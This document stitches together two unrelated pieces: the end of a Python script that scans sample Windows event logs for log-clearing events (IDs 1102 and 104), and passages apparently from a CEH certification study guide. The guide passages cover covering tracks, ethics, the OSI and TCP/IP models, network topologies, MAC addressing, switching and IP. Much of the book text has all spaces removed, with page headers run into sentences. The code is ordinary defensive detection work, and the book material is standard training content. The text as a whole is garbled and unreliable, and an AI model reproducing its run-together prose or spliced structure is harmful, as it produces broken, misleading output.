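{"Channel": "Security", "EventID": 4624, "TimeCreated": "2021-03-01T09:12:00Z", "Computer": "WS01", "SubjectUser": "jdoe"}
{"Channel": "Security", "EventID": 1102, "TimeCreated": "2021-03-01T09:15:30Z", "Computer": "WS01", "SubjectUser": "jdoe"}
{"Channel": "System", "EventID": 104, "TimeCreated": "2021-03-01T09:15:31Z", "Computer": "WS01", "SubjectUser": "jdoe"}
{"Channel": "Security", "EventID": 4672, "TimeCreated": "2021-03-01T10:00:00Z", "Computer": "WS02", "SubjectUser": "svc-backup"}
"""

# Channel -> event ID that records a wipe of that channel.
LOG_CLEARED_EVENTS = {"Security": 1102, "System": 104}


def parse_export(text):
    """Parse the JSON-lines export into a list of dicts, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def find_log_wipes(events):
    """One finding per log-cleared event: who cleared which log on which host, and when."""
    findings = []
    for ev in events:
        if LOG_CLEARED_EVENTS.get(ev.get("Channel")) == ev.get("EventID"):
            findings.append({
                "host": ev["Computer"],
                "channel": ev["Channel"],
                "user": ev.get("SubjectUser", "<unknown>"),
                "time": ev["TimeCreated"],
            })
    return findings


def hosts_with_multiple_wipes(findings):
    """Hosts where more than one log channel was cleared: a stronger signal than a single clear."""
    per_host = {}
    for f in findings:
        per_host.setdefault(f["host"], set()).add(f["channel"])
    return sorted(host for host, chans in per_host.items() if len(chans) > 1)


if __name__ == "__main__":
    wipes = find_log_wipes(parse_export(SAMPLE_EXPORT))
    for w in wipes:
        print(f"{w['time']} {w['host']}: {w['channel']} log cleared by {w['user']}")
    print("hosts with multiple logs cleared:", hosts_with_multiple_wipes(wipes))
```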
13Onethingtokeepinmindwhenyouaretryingtocoveryourtracksisthatsometimesyouractionsmayalsoprovideevidenceofyourwork.OneexampleisthatwipinglogsonaWindowssystemwillleavealogentryindicatingthatthelogshavebeenwiped.Thismaybeanindicationtoanyonewatchingthelogsthatsomeonetriedtoeraseevidence.It’snotaguaranteethatthelogwipewasmalicious,butitmaybeenoughtopromptsomeonetoinvestigatefurther.Becauseofthis,coveringtrackscanbechallenging.Thismay,though,beexactlywhatyou’vebeenaskedtodo—­challengeandtesttheresponsecapabilitiesoftheoperationsteam.Asaresult,it’salwaysimportanttokeepinmindtheobjectivesofyourengagement.SummaryIt’shardtooverstatetheimportanceofethics.YouwillbeexpectedtoadheretoacodeofethicswhenyousignupforyourCEHcertificationandpassyourexam.You’llneedtoactinaprofessionalmanneratalltimeswithyourclientsandemployers.Youwillneedtobearesponsiblecustodianofanydataentrustedtoyou.Chapter2NetworkingFoundationsTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Networkingtechnologies✓✓Communicationsprotocols✓✓Telecommunicationstechnologies✓✓Networktopologies✓✓SubnettingWhileitmaynotlookliketherearealotoftopicsthatarecoveredintheexaminthischapter,whatiscoveredisfoundationalformuchofwhatcomeslater.Afterall,unlessyouaresittingatthecomputeryouareattacking,whichwouldbeveryuncommon,you’regoingtobeinteractingwiththenetwork.Insomecases,thedifferentattacks,andcertainlythedefenses,willmakeuseofnetworkingtechnologiesandcommunicationsprotocols.Tounderstandhownetworksfunction,itmaybehelpfultohaveaconceptualunderstandingofhowtheprotocolsfittogether.Thereisoneconceptualmodelusedtodescribecommunicationprotocolsandtheirfunctions.Thereisanotherwayofdescribingthesefunctions,sometimescalledamodel,butit’smoreofanas-­builtarchitecturaldesign.Inthischapter,I’llcoverboththeOpenSystemsInterconnection(OSI)modelandtheTCP/IParchitecture.Youwillbeexpectedtounderstandnetworktopologies.Topologiesaregenerallyconceptualandcanbeusedasawayoflogicallyorganizingsystemstoseehowtheyareconnected.Thiswillstartusdownthepath
oftalkingaboutthephysicalelementsofnetworks,includinghowtheyareaddressed.Ultimately,whenwearenetworkingsystems,wewantthemtobeabletocommunicatewithoneanother.Todothat,eachsystemneedstohaveawayforotherstoaddressit.Asyouwillsee,eachsystemwillhavemultipleaddresses.Thisrefersbacktothemodelsmentionedearlierbecausethedifferentaddressesarewaysofcommunicatingwiththedifferentfunctionsatdifferentlayers.Aswemoveupthenetworkstacksfromthephysicalcomponents,we’llstarttalkingabouttheprotocolsyouareperhapsmostfamiliarwith:InternetProtocol(IP),TransmissionControlProtocol(TCP),andUserDatagramProtocol(UDP).Thesewillbethefoundationalprotocolsyouwillneedasolidunderstandingoffornotonlytestingsystemsbutalsoprovidingguidanceastohowdifferentvulnerabilitiesmayberemediatedbycompaniesyouareworkingfor.Onecommonapproachtoprovidinginformationtechnologyservicesincompanies,especiallyiftheservicesaretoexternalusersorcustomers,istouseserviceproviders.Cloudcomputingcanbeusedasanimplementationofthistypeofoutsourcing.Makinguseoftheseserviceprovidersandworkingwithorganizationsthathaveplacedsystemsandserviceswiththemintroducessomespecificchallengestosomeoneperformingsecurityassessmentsorpenetrationtests.Thismeansthatunderstandinghowtheseexternalserviceprovidersworkcanbeessential.CommunicationsModels 
17CommunicationsModelsWeaccesssystemsthroughtheiraddresses.Theproblemisthateachsystemwillhavemultipleaddresses.Theseaddressesarebestseparatedintobucketsrelatedtothefunctionalityprovidedbytheprotocoleachaddressbelongsto.Thefirstcommunicationsmodel,fromthestandpointofwhatwe’llbetalkingaboutbutalsofromthestandpointofhistory,meaningitessentiallycamefirst,ismoreconceptualthanstrictlypractical.Iwillfollowupwithapracticalmodel.Thesecommunicationsmodelsarebrokenintolayers,andthelayersarestackedontopofoneanother.Becauseitshowsupasastackoftiers,youwilloftenhearthemreferredtoasnetworkstacksorprotocolstacks.Oneimportantaspecttoconsiderwhenitcomestothesenetworkstacksisthatthelayersareallseparateandthefunctionalityisdistinct.Whentwosystemsaretalking,eachhasthesenotionallayers,andlayerConthefirstsystemcanonlytalktolayerC,notlayersB,A,orD,onthesecondsystem.ThisisbecausetheprotocolsatlayerConbothsystemsmatch.Thesameistruefortheotherprotocols.Asanexample,youcanseeasetofnetworkheadersinFigure 2.1.Thelayer/functionthatgeneratedthissetofheadersonthesendingsidecanbereadonlybythesamelayer/functiononthereceivingside.FIGURE 2.1 Networkheaders18 Chapter2  
NetworkingFoundations■ProtocolsPerhapsbeforegoingtoomuchfurther,Ishoulddefinewhataprotocolis.Aprotocolisasetofrulesorconventionsthatdictatecommunication.Whenyoumeetsomeoneyouknowonthestreet,youmaynodorsayhello.Theywilllikelyreturnyourgreeting.Thisisaprotocol.Youknowwhatyoushouldsayordoandtheothersideofthecommunicationknowswhattheresponseis.Computersareessentiallythesame—­theyknowsetsofrulesandexpectedbehaviors.Withouttheseprotocols,youcouldgreetyouracquaintancebystickingyourlittlefingerintoyourear,andtheotherpersoncouldremoveashoeandthrowitatyou.Thiswouldbeaprotocolmismatch,andneitherofyouwouldhaveanyideawhattheappropriateresponseisbecausetheydon’tknowwhattheinitialcommunicationattemptmeant.Aswegothroughthetwocommunicationsmodels,I’lltalkaboutnotonlythefunctionsthatexistateachlayer,butalsotheprotocolsthatexistateachlayer.Whenwe’redone,you’llhavetwodifferent,butnotdissimilar,waysofunderstandinghowprotocolscommunicateacrosssystemsandhowmessagesbetweensystems/applicationsareputtogether.Dissectingthefunctionsofnetworkcommunicationsintolayersmeansthefunctionsaremodularized.Thismeansthatitcanbeeasytoextractoneprotocolfromthechainandinsertanotherone.ThesameapplicationsworkoverEthernet,forexample,astheonesthattraveloverSONETorFrameRelay.Alltheseprotocolsexistatthesamelayer.Thisworksbecausethefunctionalityofeachlayerisabstracted,meaninglayerscancommunicatewitheachotherwithoutneedingtoknowthedetailsbecausethefunctionalityisknown.Theindividualprotocolsdon’tmatter,necessarily.Therearemanydifferentprotocolsforeachofthelayers,nomatterwhichmodelwearetalkingabout.OpenSystemsInterconnectionPriortothelate1970s,communicationssystemsusedproprietaryprotocols,makingithardertoconceptualizewhatwashappening.Eachprotocoldefineddifferentcommunicationsindifferentways.Inthelate1970s,theInternationalOrganizationforStandardization(ISO)beganaprocesstodefineasetofstandardsforcommunication.Theideabehindthiswastoallowforbetterinteroperabilitybetweenvendors.Ifallthefunctionsarebrokenoutconceptually,th
einterfacepointsareclearerand,assuch,easiertointeractwith.In1978,aninitialmodelwasannounced.Afterrefinements,itwaspublishedastheOSImodel.Whiletherewereconcernsaboutthecomplexityofthismodelandthechancethatitwasunlikelytobeimplemented,itremainsasolidmodeltohelprefertoboundariesbetweenfunctionswithinanetworkstack.TheOSImodelincludessevenlayers.Whenindicatingaparticularfunctionality,networkprofessionalsmaymakereferencetothefunctionbythelayernumber.We’llseehowthisworksshortly.CommunicationsModels 19FIGURE 2.2 ThesevenlayersoftheOSImodelApplicationPresentationSessionTransportNetworkDataLinkPhysicalFigure 2.2showsthesevenlayersoftheOSImodel.Intalkingaboutthemodel,wetypicallystartatthegroundfloorandworkourwayuptothepenthouse.Atthebottomofthemodeliswhereyouconnecttothenetwork.Atthetopiswhereyouinteractwiththe user.SincewebuildmessagesfromtheApplicationlayerdown,we’regoingtostartdiscussingeachofthelayersandtheirrolesthereandmovedownward.Forwhatit’sworth,though,thevariousmnemonicsthatareoftenusedtohelppeoplerememberthedifferentlayersstartatthebottom.Forexample,oneofmystudentsoncesuggested“PleaseDoNotTouchSteve’sPetAlligator”tohelpremembertheorder.That’sbottomtotop,though.Regardless,ifyouremembereitherorderandthencanrememberwhateachofthelayersdoes,you’llbeingoodshape.Application(Layer7)  TheApplicationlayeristheoneclosesttotheenduser.Thisdoesnotmeanthatitistheapplicationitself,however.Wearetalkingaboutprotocols.Applicationlayerprotocolsmanagethecommunicationneedsoftheapplication.Theymayidentifyresourcesandmanageinteractingwiththoseresources.Asanexample,theHypertextTransferProtocol(HTTP)isanApplicationlayerprotocol.Ittakescareofnegotiatingforresources(pages,etc.)betweentheclientandtheserver.Presentation(Layer6)  
ThePresentationlayerisresponsibleforpreparingdatafortheApplicationlayer.Itmakessurethatthedatathatishandeduptotheapplicationisintherightformatsoitcanbeconsumed.Whensystemsarecommunicating,theremaybedisconnectsinformattingbetweenthetwoendpoints,andthePresentationlayermakessurethatdataisformattedcorrectly.Assuch,characterencodingformatsliketheAmericanStandardCodeforInformationInterchange(ASCII),Unicode,andthe20 Chapter2  NetworkingFoundations■ExtendedBinaryCodedDecimalInterchangeCode(EBCDIC)allbelongatthePresentationlayer.Additionally,theJointPhotographicExpertsGroup(JPEG)formatisconsideredtobeatthePresentationlayer.Session(Layer5)  TheSessionlayermanagesthecommunicationbetweentheendpointswhenitcomestomaintainingthecommunicationoftheapplications(theclientorserver).Remoteprocedurecalls(RPCs)areanexampleofafunctionattheSessionlayer.TherearecomponentsoffilesharingthatalsoliveattheSessionlayer,sincenegotiationofcommunicationbetweentheendpointsneedstotakeplace.TheApplicationlayertakescareofmanagingtheresourceswhiletheSessionlayertakescareofmakingsurethatfiles,asanexample,aresuccessfullytransmittedandcomplete.Transport(Layer4)  TheTransportlayertakescareofsegmentingmessagesfortransmission.TheTransportlayeralsotakescareofmultiplexingofthecommunication.BoththeTCPandtheUDParetransportprotocols.Theseprotocolsuseportsforaddressing,soreceivingsystemsknowwhichapplicationtopassthetrafficto.Network(Layer3)  TheNetworklayergetsmessagesfromoneendpointtoanother.Itdoesthisbytakingcareofaddressingandrouting.TheIPisoneprotocolthatexistsatthislayer.DataLink(Layer2)  Oneotheraddresstocontendwithisthemediaaccesscontrol(MAC)address.Thisisalayer2address,identifyingthenetworkinterfaceonthenetworksocommunicationscangetfromonesystemtoanotheronthelocalnetwork.TheAddressResolutionProtocol(ARP),virtuallocalareanetworks(VLANs),Ethernet,andFrameRelayareDataLinklayerprotocols.Theytakecareofformattingthedatatobesentoutonthetransmissionmedium.Physical(Layer1)  
Thislayerprobablyspeaksforitself.Thisisalltheprotocolsthatmanagethephysicalcommunications.10BaseT,10Base2,100BaseTX,and1000BaseTareallexamplesofPhysicallayerprotocols.Theydictatehowthepulsesonthewirearehandled.OneoftheproblemswiththeOSImodelisthattherearenotalwaysgoodfitswhenitcomestomappingprotocolstothesevenlayers.TheproblemoftencomesintheareasbetweentheSessionandApplicationlayers.Asanexample,atwhichlayerdoestheSecureShell(SSH)protocollive?IsittheSessionlayerbecauseitultimatelymanagessessions,orisitthePresentationlayerbecauseitincludesencryptionmechanismsandnegotiatesthem?Otherprotocolsseemtoexistbetweenlayers.ARP,forinstance,issaidtooperateattheDataLinklayer,butitneedstoknowabouttheNetworklayerbecauseitprovidesthebridgebetweentheaddressinginthosetwolayers.However,thereareplaceswherehavingthemodelmakesconceptualizingthingsmucheasier.Forexample,youprobablyhaveadeviceinyourhomethat’sveryconfusing.Youmaycallitarouter,oryoumayknowpeoplewhocallitarouter.Theproblemisthatroutingisalayer3function,asdiscussedearlier,andthereareotherfunctionsinthedevicethatarestrictlylayer2,meaningyouhaveswitchportsthattransmitmessagesonyourlocalnetworkCommunicationsModels 
21wherethereisnoroutinginvolved.Additionally,it’sentirelypossibleyourdeviceisn’tevendoinganyrouting,butinsteaditmaybebridgingtoyourprovider’snetwork.Italldependsonhowyourdeviceisworkingandwhatyourproviderisexpectingfromyourdevice.Thisiswhereunderstandingthedifferentlayersishelpful.Youcanbetteridentifywhereyoumayhaveproblemsbecauseyoucanisolatefunctionality.TCP/IPArchitectureInthelate1960s,theARPAnetwasfirstdevelopedandimplemented.Overthenextfewyears,itgrewfarbeyondtheinitialtwoandthenthreenodesthatwereconnectedin1968–69.Asmoresystemswereconnectedtothenetwork,thepeopleresponsibleformanagingthenetworkanddevelopingtheprotocolsusedtoexchangeinformationlearnedalot.Theinitialprotocolwasthe1822protocolthatdefinedcommunicationstotheInterfaceMessageProcessor(IMP),whichwasalargecomputerwithspecializedinterfacesactingasamessagegateway(thinkofitasaveryprimitiverouter).The1822protocolwaslaterreplacedbytheNetworkControlProgram(NCP).By1983,aftermanyyearsofdevelopment,theNCPwasreplacedentirelybyasuiteofprotocolsnowcommonlycalledTransmissionControlProtocol(TCP)/InternetProtocol(IP).ThewaythesuiteofprotocolsusedwithinTCP/IPstackisdescribedisslightlydifferentfromthewaytheOSImodelisdescribed.AfterTCP/IPwasimplemented,theconceptualdesignoftheprotocolswasdescribed.Forthisreason,thesuiteissometimesreferredtoasamodel,butitmayalsobereferredtoasanarchitecture,sinceit’sadescriptionofanas-­builtdesignratherthansomethingconceptual.OSIisentirelyconceptualsinceitdidn’tdescribeanythinginparticular.TheTCP/IParchitectureisamuchsimplerdesignthantheOSImodel,whichisanimmediatedifferenceandareflectionoftheas-­builtnatureofthedesignascomparedwiththeconceptualdesignoftheOSI.SincetheOSImodelhadtobeabstractandflexibletoaccommodateawidevarietyofprotocolsanddesigns,itwasbrokenoutintothesevenfunctionalcategoriesdescribedearlier.TCP/IP,ontheotherhand,asanas-­builtdefinition,isonlyfourlayers.ThisisnottosaythatthereisnocorrelationbetweentheOSImodelandtheTCP/IParchitecture.AsyoucanseeinFigure 
2.3,thereismuchthatissimilarbetweenthetwo.FIGURE 2.3 TheTCP/IParchitecturelayersApplicationTransportInternetLink22 Chapter2  NetworkingFoundations■You’llnoticethesimilarities.Forastart,thereisanApplicationlayerinboth.ThereisalsoaTransportlayer.TheInternetandNetworklayersarenamedverysimilarly.EssentiallywhathappensisthattheSession,Presentation,andApplicationlayersfromtheOSImodelarecollapsedintotheApplicationlayerintheTCP/IPmodel.Additionally,thePhysicalandDataLinklayersfromtheOSImodelarecollapsedintotheLinklayerintheTCP/IPmodel.ThesamefunctionsfromthecollapsedlayersexistintheTCP/IPmodel.Conceptually,though,it’seasiertounderstand.Anythingrelatedtotheapplicationcommunication,includinganysessionmanagementanddataformatting,isintheApplicationlayer.Similarly,intheTCP/IPmodel,thePhysicallayerandtheDataLinklayerareputtogether.Regardlessofwhichmodelyouprefertothinkaboutnetworkingin,you’llfindthatprotocolsdon’tgenerallysprawlacrossmultiplelayers.Theyaredesignedtofilltherequirementsofaspecificfunction,whichwilllandprettysquarelyintooneofthelayersofeachmodel.Intherestofthechapter,andfairlycommonlyintherealworldinmyexperience,whenyouseeareferencetolayers,thereferenceistotheOSImodelandnottheTCP/IParchitecture.TopologiesThewaynetworksaredesignedalsousesconceptualmodels,asawayoftakingaratmazeofphysicalnetworksandmappingthemtoalogicalrepresentation.Thisisnotonlyaboutgettingalogicalmapofthenetworkbutalsohelpstoidentifyhoweverythingisconnectedsinceitwillhelptoisolatepotentialissues.Differenttopologiesintroducedifferentpotentialproblems.You’llalsotypicallyfindthatsometopologiesareonlyfoundincertainsituations.Somewillbefoundinserviceprovidernetworks,whileothersaremorecommonlyfoundinlocalareanetworks.BusNetworkAbusnetwork,asshowninFigure 
2.4,consistsofasinglenetworkcabletowhicheverydeviceonthenetworkconnects.Abusisacommunicationchannel.Youmayfindabusinsideyourcomputertocommunicatebetweenchannels.Inourcase,it’sacommunicationchannel(asinglenetworkcable)thatallowsthecommunicationbetweenmultiplecomputers.ThewaysomebusnetworksworkisbyusingacoaxialcablewithT-­connectors.TheT-­connectorprovidesawaytoextractthesignalfromthebusinordertoprovideconnectivitytothesystemsonthenetwork.Thistypeofbusnetworkrequiressomethingontheendofthecabletokeepthesignalonthewire.Theseelectricaldevicesarecalledterminators.Youcanseetheblocksontheendofthebus.Theykeepthesignalfromreflectingbackontothewire,causingcancellationofthesignal.Topologies 23FIGURE 2.4 BusnetworkWhatyouwillnoticewiththebusnetworkisthatthereisnomediatingdevice.Allofthecomputersareconnecteddirectlytooneanotherbymeansofthatsinglenetworkcable.StarNetworkWhenyouseeadiagramofastarnetwork,itwilloftenlooksimilartothebusnetwork.Thedifferencebetweenthebusandthestarnetwork,however,isthatthereisamediatingdevicebetweenallthedevices.Thismaybeahub,ifyouhaveaveryoldnetwork,whichisadumbelectricalrepeater,oryoumayhaveaswitch.YoucanseeatraditionaldiagraminFigure 2.5.Inthecaseofthisdiagram,thecentrallineyousee,whichlookslikeabus,isreallyaswitchorahub.Thesedeviceswillthensendthesignalsthatcomeinbackouttotheotherdevices.Inthecaseofahub,everydeviceonthenetworkwillgetit.Ifyournetworkusesaswitch,thesignalwillbesenttothecorrectport.FIGURE 2.5 Starnetwork24 Chapter2  
NetworkingFoundations■Andthisiswherethedifferentlayersarehelpful.Aswitch,whichisthemostcommondeviceinastarnetworktopology,actsatlayer2oftheOSImodel.ItusestheMACaddresstomakedecisionsaboutwheretrafficgoes.Inthecaseofastarnetworkwithahub,therearethesameissuesastherewouldbewithabusnetwork—­lotsofcollisionswheremessagessentoutonthewirerunoverothermessagessentbysomeoneelse.Aswitchalleviatesthoseissuesbecauseonlytrafficaddressedtoasystemgetssenttothatsystem.RingNetworkAringnetworkissimilartoabusnetworkinthesensethatallofthenodesonthenetworkappeartobeconnectedonacontiguousnetworksegment.Trafficpassesaroundtheringfromsystemtosystem.YoucanseealogicalrepresentationinFigure 2.6.Thereasonit’salogicalrepresentationisbecausephysically,thisisnothowthesenetworksarewired.Onetypeofringnetworkisatokenring.Inatokenringnetwork,systemsarewiredasthoughtheyareinastar,usingmultistationaccessunits(MAUs).Whiletheyarewiredthatway,theydon’tbehavelikeastar.Thisiswhereyoushouldrememberthattheseareconceptualmodels.Thebehavior,regardlessofthewiring,ishowthetopologiesarenamed.FIGURE 2.6 RingnetworkJustaswithabusnetwork,thereisaproblemwithcollisions.Atokenringnetworkavoidsthisproblembyusingatalkingstick.Justaswhenyouaresittingaroundacampfireinanaboriginaltribe,whereonlythepersonwiththestickgetstotalk,atokenringnetworkusesadigitalrepresentationofthetalkingstickcalledatoken.Onlythesystemthathasthetokengetstotalk.Ifthereisnosystemthatneedstosendamessage,thetokengetspassedfromsystemtosystem.Whenasystemneedstotalk,ithastowaitforthetokentogetpassedaroundtoit.Thiswilltheoreticallyavoidtheproblemwithcollisionsexceptthatsometimesthetokengetslost,whichmeansanewtokenhastogetgenerated.AfterthenewTopologies 
25tokengetsgenerated,it’spossiblefortheoldtokentosuddenlyget“found”again,meaningtherearetwotokensonthenetwork.Inspiteofaringnetworkbehavinglikeabusnetwork,thereisn’taneedforterminatorsasthereisinabusnetwork.Thehardwarenecessarytohavethenetworkfunctionasthoughitwereinaringconfigurationtakescareoftheproblemofechoesbacktothewire.MeshNetworkInanothertopology,systemsarewireddirectlytooneanother.Figure 2.7showsanexample.Thislooksalittleasthoughtheyarewiredinaring,butit’smorelikepeertopeer.Togetfromonesystemtoanother,iftheyarenotwiredtogetherdirectly,asystemhastopassthroughanothersystem.Meshnetworkswilltypicallyavoidanotherpotentialproblemwithabusnetwork.Ifasysteminthemiddleofthebusnetworkfails,thereisapotentialfortheentirenetworktofailalongwithit.Thesystemessentiallyactslikeaterminatorbynotallowingtheelectricalsignaltopassthroughit.Ifasysteminameshnetworkfails,thereisprobablyanotherpathwaytogetbetweenonesystemandanother.FIGURE 2.7 MeshnetworkWhileyoucanconnectsystemstogetherinmultiplewaysinameshnetwork,inspiteoftheorderlinessthatthecirculardesignofthenetworkshows,acoupleoffailurescanpotentiallyisolatenodesinameshnetwork.Thewayaroundthatistoaddconnections.Themorepathwaystogetfromonesystemtoanother,thelesschancefailurewillbecatastrophic,meaningcommunicationdoesn’thappen.Youcankeepaddingconnectionsuntil26 Chapter2  NetworkingFoundations■everysystemhasconnectionstoeveryothersystemonthenetwork.YoucanseeanexampleofthistypeofdesigninFigure 2.8.Whatyouseeinthediagramiswhat’scalledafullmeshnetwork.Everysysteminthenetworkhasaconnectiontoeveryothersystem.FIGURE 2.8 
FullmeshnetworkTheproblemwithaddingmoreconnectionsistheresultingcomplexity.Youcanseealittleofthat.Diagrammingitmakesithardtoseewherealltheconnectionsare.Everytimeyouaddanodetothenetwork,youdon’tjustaddasingleconnection.Youaddthesamenumberofconnectionsasyouhaveexistingnodes,soyourconnectionsincreasenearlyexponentially.Infact,todeterminethenumberofconnectionsyouhave,youcanusetheformulan(n–1)/2.Everysystemhasaconnectiontoeveryothersystemexceptitself,whichiswhywemultiplythenumberofsystemsbyonelessthanthenumberofsystems.(Forexample,ifyouhad5systems,theformulawouldlooklike5(5–1)/2.Thatwouldbe5*4,whichis20,dividedby2,givingyou10connections.)Wedivideby2becausewearen’tgoinginbothdirectionsfromonesystemtoanother.Weneedonlyasingleconnection.HybridEachoftheprevioustopologiesisgood,giventherightcircumstances.However,therearecircumstanceswhereblendingmultiplenetworktopologiesistherightwaytogoaboutconnectingyournetwork.Onecommonhybridapproachisthestar-­bus.Ifyouhaveswitchescapableof64 networkconnectionsbutyouhave200usersthatyouneedtoconnecttoyourPhysicalNetworking 
27localnetwork,youwouldneedtoaddabusintoyournetworktopology.Thebuswouldconnectallofyourswitchestogetherandbecomeabackboneforyournetwork.Thenfromeachswitch,youhavethetraditionalstarwherealltheconnectionscomebacktotheswitchtheyareconnectedto.Similarly,itmaybehelpfultoconnectyourswitchinginfrastructureineitherameshoraring.Thismaybeforredundancypurposes,toensuremultiplepathwaystogettoallofyournetwork.Ifeverythingwasinabusandthebusfailed,somenetworksegmentsmaybeisolated.Asaresult,settingupyournetworkwithmultiplepathwayscanmakealotofsense.Ameshnetworkoraringnetworkmayhelpwiththat.PhysicalNetworkingAtsomepoint,youneedtoconnecttothenetwork.Therearemultiplecomponentstothatinteraction.Youneedanetworkinterfaceonyourend.Youneedamediumthatisgoingtocarrythecommunication.Youneedtohavesomethingontheotherendofthecommunication.Becausewearen’tlikelygoingtobeworkingatserviceprovidersortelecommunicationsprovidersaswearedoingsecuritytesting,atleastnotontheprovidersideofthenetwork,wearen’tgoingtoworryaboutprotocolslikeFrameRelay,AsynchronousTransferMode,orFiberDistributedDataInterface.TheprotocolyouwillalmostexclusivelyrunacrosswhenwearetalkingaboutphysicalnetworkingisEthernet.Eachlayerofthenetworkstackhasadifferenttermtorefertothechunkofdataencapsulatedbythatlayer.Thesechunksarecalledprotocoldataunits(PDUs).ThePDUatlayer 
2,whichisapartofwhatwearetalkingabouthere,isaframe.Whenyouarelookingatachunkofdatawiththephysicaladdressinit,youarelookingataframe.We’lltalkaboutthenamesoftheotherPDUswhenwegettothoselayers.AddressingEthernetinterfacesallhaveaddresses.Theseaddressesareexclusivetoeachnetworkinterface,andtheyarecalledMACaddresses.BecausetheMACaddressishard-­codedintothehardwareoftheinterface,itissometimesreferredtoasthehardwareaddress.Sinceit’salsotheaddressthatisusedbyaphysicalpieceofhardware,itissometimesreferredtoasaphysicaladdress.ThecommonformatofaMACaddressis6octets(8-­bitbytes)generallyseparatedbycolons.AnexampleofaMACaddresswouldbeBA:00:4C:78:57:00.Theaddressisbrokenintotwoparts.Thefirstistheorganizationallyuniqueidentifier(OUI).ThisisalsocalledthevendorIDbecauseitidentifiesthenameofthecompanythatmanufacturedtheinterface.ThesecondhalfoftheMACaddressistheuniqueaddresswithinthevendorIDofthatinterface.So,halfisforthevendor,andhalfisforthecarditself.28 Chapter2  NetworkingFoundations■MACAddressesTheMACaddressisrepresentedinhexadecimalvaluesbecauseit’sacommonwaytorepresentoctets.Apairofhexadecimalvaluescoverstherangeofpotentialvaluesofabyte—­00is0,andffis255.YoumayalsorunintothiswhenlookingatIPaddressesandcertainlyanytimeyoudoahexadecimaldump.TheMACaddressisusedexclusivelyonyourlocalnetwork.AnysystemthatwantstosendyouanythingwilladdressittoyourMACaddress.Youcanalsosendmessagestoeverydeviceonthenetworkbyusingthebroadcastaddress.ThebroadcastMACaddressisff:ff:ff:ff:ff:ff.Yournetworkinterfaceknowswhataddressithas,becauseit’sinthehardware.Whatthismeans,though,isthattrafficthatisinsomewayaddressedtotheinterface,eitherdirectlytoitsaddressortothebroadcastaddress,forexample,willgetforwardeduptotheoperatingsystemfromthenetworkinterface.Everythingelsewillgetignored,unlesstheinterfaceistoldspecificallynottoignoreit.Thiswouldbeanunusualcase,thoughitisnecessaryforpacketcaptures.SwitchingMACaddressesarethecornerstoneforswitching.Switchingiswhathappenswhendecisionsaboutforwardingmessagesaremadebas
edonthephysicaladdress.Aswitchisreallyamultiportbridge.TrafficisforwardedfromoneinterfacetoanotherbasedonwhatthedestinationMACaddressis.Thisdoes,though,meanthattheswitchneedstoknowwhatMACaddresslivesatwhichport.Itdoesthisbywaitinguntilamessagecomesinoneachportandnoticesthesourceaddress.Becausehavingtoperformalookupofwhichporttoforwardamessagetotakestime,whichwillslowdownmessagetransmission,it’sessentialthatthelookupbeasfastaspossible.Thisisgenerallyaccomplishedthroughtheuseofsomethingcalledcontent-­addressablememory(CAM).Thismeansthattolookupavalue,yousearchforitbasedonanothervalue.Insteadofanarrayofdataindexedwithnumericvalues,meaningwelookupavaluebyusingsomethinglikearray[5]togetthevalueatindex5 inthearray,weuseaMACaddressastheindexvalue.Thismeansthatyouneedtosearchthroughallthedataorkeepitsortedinordertofindanything.Thisistime-­consuming.It’seasiertolookupaportvaluebyjustindexingtotheMACaddress.Whataswitchdoes,whichisthevalueofswitching,ismakedeterminationsaboutwhattrafficgoestowhichportbasedonthedestinationMACaddress.Thisreducestheamountoftrafficgoingouttheswitchportanddownthewire.Thisimprovesperformancebecauseyoucanfillthenetworkconnectionwithtrafficspecifictothesystemconnectedtotheswitchportratherthanfloodingitwithalltheothertrafficonthenetwork.Thisdoescausesomeotherproblems,though,whenitcomestosecuritytesting.Inaswitchedenvironment,youonlyseetrafficmeantforthatsystemconnectedtotheswitchport.Whenperformingsecuritytesting,actinglikeanattacker,it’smoreconvenienttobeabletoseemoretrafficthanthat.IP 
There are some ways around that challenge. One of them, if you have some control over the switch, is to tell the switch to mirror traffic on one port to another port (a mirror or SPAN port). Then, you need to have the system you are running attacks from attached to the mirror port. Another way is to fool the switch into sending traffic to you, which involves methods of attack that we'll cover in later chapters.

IP

Moving into the Network layer, we run across IP. Certainly there are other protocols that exist at the Network layer, such as Novell's Internetwork Packet Exchange (IPX), but as the Internet runs on IP and its associated protocols, we'll focus there. So far, we haven't talked much about headers. As each layer is passed through, a set of data is added to the message that is specific to the protocol processing the message. This set of data is called a header. Each protocol has its own set of headers that get attached. The message is then encapsulated by the headers, creating an entirely new PDU. For IP, the PDU is called a packet. You may hear every set of data on the network referred to as a packet, but from a technical standpoint, a message from the IP header down is a packet.

Addressing is something to consider, as well. This is an aspect that people who work with networking are often fairly familiar with, but it's useful to understand what an address comprises. Associated with the address is the subnet mask. This can be challenging to understand, but there are some mathematical tricks that can help, once you know them. There are also a couple of different ways to render the subnet mask, and you'll often run across both of them.

There are currently two versions of IP in use. The one that is most common is version 4, commonly designated as IPv4. We've been in the process of switching over to version 6 for the last couple of decades. It hasn't happened yet, but every modern device and operating system supports IPv6, so you will see an IPv6 address on most systems you will interact with. IPv6
has some differences over IPv4, not the least of which is the size of the address space.

IP is considered a best-effort protocol. It does its best to get packets from the source to the destination. It does nothing to absolutely ensure that they get there. It does facilitate the transmission, however, by providing addressing.

Headers

The Internet Engineering Task Force (IETF) is responsible for producing and maintaining most of the documentation related to Internet protocols. When someone, or more commonly a group of people, wants to propose a new protocol or an extension to an existing protocol, they write something called a request for comments (RFC) document. The IETF manages the process of getting RFCs approved, and the RFC Editor publishes the series. The first RFC was written in 1969 and was related to the host software for the IMP that was used to interface a computer system to the ARPAnet. At the time, of course, the IETF didn't exist, but using RFCs was still the process for creating specifications and standards.

The RFC for IP, which was published in 1981, is 791. It defines how IP is supposed to work and also defines the header fields used by IP. Figure 2.9 shows a set of IP headers from a message captured off the network. This is the same set of headers that would be presented in the form of a table in the RFC referenced. The difference between the table form and just looking at the headers in this way is that with the table, you can clearly see the size of each header field.

Figure 2.9: IP headers

The following are the header fields with their descriptions and sizes:

Version: This field indicates which version of IP is in this packet. This is a 4-bit field.

